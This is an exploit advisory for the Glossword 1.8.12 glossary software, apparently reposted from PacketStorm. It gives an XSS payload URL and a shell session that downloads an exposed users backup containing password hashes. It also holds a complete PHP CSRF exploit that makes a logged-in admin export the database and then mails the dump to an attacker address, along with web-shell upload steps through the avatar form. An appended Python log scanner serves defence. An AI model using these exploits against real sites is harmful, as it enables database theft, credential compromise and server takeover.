Praetorian503 Posted February 5, 2013

Glossword version 1.8.12 suffers from database backup disclosure, cross site request forgery, cross site scripting, and remote shell upload vulnerabilities.

===================================================
Vulnerable Software: Glossword 1.8.12
Tested version: Glossword 1.8.12
Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.12/
Vulns: XSS && Database Backup Disclosure && CSRF && Shell upload.
Dork: Powered by Glossword 1.8.12
===================================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===================================================
About vulns:

XSS
http://hacker1.own/glosslatest/glossword/1.8/gw_admin.php?a="><script>alert(1);</script>&t=settings

===================================================
Database Backup disclosure:

root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# grep 'umask' /etc/pam.d/common-session
session optional pam_umask.so umask=0067
root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# umask -S
u=rwx,g=x,o=

# NOTE 1: Notice database backups chmod'ed to 777 by script #
# NOTICE 2: BELOW database backups are accessible via HTTP REQUESTS #

root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# ls -liash
total 1.1M
65345 4.0K drwxrwxrwx 2 hacker1user hacker1user 4.0K Feb 3 08:41 .
60499 4.0K drwxr-xr-x 3 hacker1user hacker1user 4.0K Feb 3 08:40 ..
65347 68K -rwxrwxrwx 1 hacker1user hacker1user 64K Feb 3 08:40 backup_gwnew_abbr_phrase.sql
65346 12K -rwxrwxrwx 1 hacker1user hacker1user 9.8K Feb 3 08:40 backup_gwnew_abbr.sql
65367 4.0K -rwxrwxrwx 1 hacker1user hacker1user 402 Feb 3 08:40 backup_gwnew_auth_restore.sql
65359 4.0K -rwxrwxrwx 1 hacker1user hacker1user 304 Feb 3 08:40 backup_gwnew_captcha.sql
65350 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.3K Feb 3 08:40 backup_gwnew_component_actions.sql
65349 8.0K -rwxrwxrwx 1 hacker1user hacker1user 6.2K Feb 3 08:40 backup_gwnew_component_map.sql
65348 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.7K Feb 3 08:40 backup_gwnew_component.sql
65365 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:40 backup_gwnew_custom_az_profiles.sql
65364 36K -rwxrwxrwx 1 hacker1user hacker1user 33K Feb 3 08:40 backup_gwnew_custom_az.sql
65368 240K -rwxrwxrwx 1 hacker1user hacker1user 234K Feb 3 08:41 backup_gwnew_dict_example.sql
65351 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.6K Feb 3 08:40 backup_gwnew_dict.sql
65374 268K -rwxrwxrwx 1 hacker1user hacker1user 263K Feb 3 08:41 backup_gwnew_history_terms.sql
65363 4.0K -rwxrwxrwx 1 hacker1user hacker1user 2.6K Feb 3 08:40 backup_gwnew_import_sessions.sql
65369 4.0K -rwxrwxrwx 1 hacker1user hacker1user 326 Feb 3 08:41 backup_gwnew_map_user_to_dict.sql
65370 24K -rwxrwxrwx 1 hacker1user hacker1user 23K Feb 3 08:41 backup_gwnew_map_user_to_term.sql
65353 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.3K Feb 3 08:40 backup_gwnew_pages_phrase.sql
65352 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.1K Feb 3 08:40 backup_gwnew_pages.sql
65354 4.0K -rwxrwxrwx 1 hacker1user hacker1user 485 Feb 3 08:40 backup_gwnew_search_results.sql
65355 4.0K -rwxrwxrwx 1 hacker1user hacker1user 538 Feb 3 08:40 backup_gwnew_sessions.sql
65356 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.2K Feb 3 08:40 backup_gwnew_settings.sql
65357 4.0K -rwxrwxrwx 1 hacker1user hacker1user 321 Feb 3 08:40 backup_gwnew_stat_dict.sql
65358 4.0K -rwxrwxrwx 1 hacker1user hacker1user 599 Feb 3 08:40 backup_gwnew_stat_search.sql
65373 8.0K -rwxrwxrwx 1 hacker1user hacker1user 8.0K Feb 3 08:41 backup_gwnew_theme_group.sql
65371 260K -rwxrwxrwx 1 hacker1user hacker1user 256K Feb 3 08:41 backup_gwnew_theme_settings.sql
65372 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:41 backup_gwnew_theme.sql
65361 4.0K -rwxrwxrwx 1 hacker1user hacker1user 908 Feb 3 08:40 backup_gwnew_topics_phrase.sql
65360 4.0K -rwxrwxrwx 1 hacker1user hacker1user 761 Feb 3 08:40 backup_gwnew_topics.sql
65362 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.2K Feb 3 08:40 backup_gwnew_users.sql
65366 4.0K -rwxrwxrwx 1 hacker1user hacker1user 949 Feb 3 08:40 backup_gwnew_virtual_keyboard.sql
65375 32K -rwxrwxrwx 1 hacker1user hacker1user 29K Feb 3 09:03 backup_gwnew_wordlist.sql
65376 48K -rwxrwxrwx 1 hacker1user hacker1user 46K Feb 3 08:41 backup_gwnew_wordmap.sql
root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# cd /tmp
root@debian:/tmp# wget --user-agent="BACKUP DISCLOSURE EXAMPLE" http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql && cat backup_gwnew_users.sql
--2013-02-03 09:13:17-- http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3184 (3.1K) [text/plain]
Saving to: “backup_gwnew_users.sql”

100%[======================================================================================>] 3,184 --.-K/s in 0s

2013-02-03 09:13:17 (13.7 MB/s) - “backup_gwnew_users.sql” saved [3184/3184]

SET NAMES 'utf8';
DROP TABLE IF EXISTS `gwnew_users`;
CREATE TABLE `gwnew_users` (
 `id_user` int(10) unsigned NOT NULL AUTO_INCREMENT,
 `login` varbinary(128) NOT NULL,
 `password` char(32) NOT NULL,
 `is_active` tinyint(1) unsigned NOT NULL DEFAULT '1',
 `is_multiple` tinyint(1) unsigned NOT NULL DEFAULT '0',
 `is_show_contact` tinyint(1) unsigned NOT NULL DEFAULT '1',
 `date_reg` int(10) unsigned NOT NULL DEFAULT '0',
 `date_login` int(10) unsigned NOT NULL DEFAULT '0',
 `int_items` int(10) unsigned NOT NULL DEFAULT '0',
 `user_fname` varbinary(64) NOT NULL,
 `user_sname` varbinary(64) NOT NULL,
 `user_email` varchar(255) NOT NULL,
 `user_perm` blob NOT NULL,
 `user_settings` blob NOT NULL,
 PRIMARY KEY (`id_user`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
INSERT INTO `gwnew_users` VALUES ('1','guest','084e0343a0486ff05530df6c705c8bb4','1','0','0','0','1359897241','1','Guest','','guest@localhost.tld','a:0:{}',0x613a343a7b733a363a226c6f63616c65223b733a333a22656e67223b733a383a226c6f636174696f6e223b733a303a22223b733a31303a22676d745f6f6666736574223b733a313a2230223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);
INSERT INTO `gwnew_users` VALUES ('2','admin','01a8e7efac66ec52b417af55940e4719','1','0','1','1359915020','1359898817','23','Admin User',' ','admin@hacker1.own','a:16:{s:8:\"IS-EMAIL\";i:1;s:8:\"IS-LOGIN\";i:1;s:11:\"IS-PASSWORD\";i:1;s:8:\"IS-USERS\";i:1;s:13:\"IS-TOPICS-OWN\";i:1;s:9:\"IS-TOPICS\";i:1;s:12:\"IS-DICTS-OWN\";i:1;s:8:\"IS-DICTS\";i:1;s:12:\"IS-TERMS-OWN\";i:1;s:8:\"IS-TERMS\";i:1;s:15:\"IS-TERMS-IMPORT\";i:1;s:15:\"IS-TERMS-EXPORT\";i:1;s:13:\"IS-CPAGES-OWN\";i:1;s:9:\"IS-CPAGES\";i:1;s:15:\"IS-SYS-SETTINGS\";i:1;s:10:\"IS-SYS-MNT\";i:1;}',...);
INSERT INTO `gwnew_users` VALUES ('3','test','098f6bcd4621d373cade4e832627b4f6','1','0','1','1359898749','0','0','','','','a:0:{}',0x613a333a7b733a383a226c6f636174696f6e223b733a303a22223b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);
root@debian:/tmp#

In this example: backup_gwnew_users.sql
gwnew_ is my custom table prefix. In fact, while installing the script it is = gw_
Feel free to create your own bruteforcer. Format is:
sql_backup_2013-02Feb-03/backup_{TABLE_PREFIX}_users.sql
Also the table prefix is not a panacea ANYMORE.
If directory index is not forbidden on the remote site/server you can see the whole
site.tld/gw_export/sql_backup_2013-02Feb-03/
directory structure and you can download it that way.

Ok, this is not the end.
There is another vector of exploitation using the CSRF vulnerability.
Here we go (CSRF + database dump stealer).
Simply trick the logged-in admin into visiting a malicious page.
If the attack is successful it will silently @mail the victim's database to you.

==============EXPLOIT BEGINS=====================
<?php
error_reporting(0);
//echo '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d');
/*
http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/
*/
//exit;
define("TARGETSITE",'http://hacker1.own/glosslatest/glossword/1.8/');
define("HACKERMAIL",'hacker@g00glemail.tld');
define("STANDARDTABLEPREFIX",'gw_');
header('Status: 404 Not found!');
echo '<h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . str_repeat(PHP_EOL,500);
for($i=1;$i<8;$i++){
echo '<img src="' . TARGETSITE . '/gw_admin.php?a=maintenance&t=settings&w1=8&w2=' . $i . '&w3=" height="0" width="0" />' .PHP_EOL;
}
$data=TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';
//echo TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';exit;
//@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . TARGETSITE . /gw_temp/gw_export/sql_backup_'. date('Y-mM-d') .
$s=file_get_contents($data);
/*
uncomment if you want to save on your server
# file_put_contents(md5(rand(1,1000)) . '.txt',$s);
*/
@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . htmlspecialchars($data) . PHP_EOL . htmlspecialchars($s) .PHP_EOL);
exit;
?>
================EXPLOIT ENDS HERE======================

Ok, now about the shell upload vulnerability (requires administrative access to the site).
After gaining access to the admin panel (e.g. via XSS or using backup disclosure)
Go to:
http://site.tld/gw_admin.php?a=edit-own&t=users
Upload your shell using: Avatar settings tab.
Don't bother about: (*The following file types are allowed: jpg, png*) because it is wrong information.
Trace it like this, access it and travel xD
http://s006.radikal.ru/i215/1302/27/d4b52ad33b39.png
Backup image: http://oi47.tinypic.com/crsde.jpg

================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep

Source: PacketStorm
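Added example (not part of the original post or of Glossword): a small log-review helper for site operators that flags the two request patterns the advisory relies on, a direct fetch of a .sql dump under gw_temp/gw_export and a gw_admin.php maintenance (export) request arriving without a same-site Referer, as the cross-site <img> trigger would. It assumes Apache combined log format; the log lines, hostnames and addresses are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (illustrative, not taken
# from the advisory). Hosts and addresses are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Feb/2013:09:13:17 +0000] "GET /glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gw_users.sql HTTP/1.1" 200 3184 "-" "BACKUP DISCLOSURE EXAMPLE"
203.0.113.5 - - [03/Feb/2013:09:14:02 +0000] "GET /glossword/1.8/gw_admin.php?a=maintenance&t=settings&w1=8&w2=3&w3= HTTP/1.1" 200 512 "http://lure.example/page.html" "Mozilla/5.0"
198.51.100.7 - - [03/Feb/2013:09:15:40 +0000] "GET /glossword/1.8/gw_admin.php?a=maintenance&t=settings HTTP/1.1" 200 512 "http://glossary.example/glossword/1.8/gw_admin.php" "Mozilla/5.0"
198.51.100.7 - - [03/Feb/2013:09:16:01 +0000] "GET /glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gw_users.sql HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def classify(line, site_host):
    """Return (finding, detail, client_ip) for one log line, or None if benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m['path'])
    query = parse_qs(url.query)
    # 1. Direct fetch of a dump under gw_temp/gw_export: a 200 means the backup
    #    directory is reachable over HTTP and must be denied in the web server.
    if '/gw_temp/gw_export/' in url.path and url.path.endswith('.sql'):
        detail = 'served (200)' if m['status'] == '200' else 'status ' + m['status']
        return ('backup_download', detail, m['ip'])
    # 2. Maintenance (export) action reached without a same-site Referer:
    #    consistent with the cross-site <img> trigger the advisory describes.
    if url.path.endswith('/gw_admin.php') and query.get('a') == ['maintenance']:
        ref_host = urlsplit(m['referer']).hostname if m['referer'] != '-' else None
        if ref_host != site_host:
            detail = 'referer ' + ref_host if ref_host else 'no referer'
            return ('maintenance_csrf_suspect', detail, m['ip'])
    return None

def scan(log_text, site_host):
    """Run classify() over every line and keep the findings, in log order."""
    return [f for f in (classify(l, site_host) for l in log_text.splitlines()) if f]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG, 'glossary.example'):
        print(*finding)
```

A 403 on the dump path shows the directory has been denied at the web server; a 200 means the export directory is still world-readable over HTTP and its contents should be treated as disclosed.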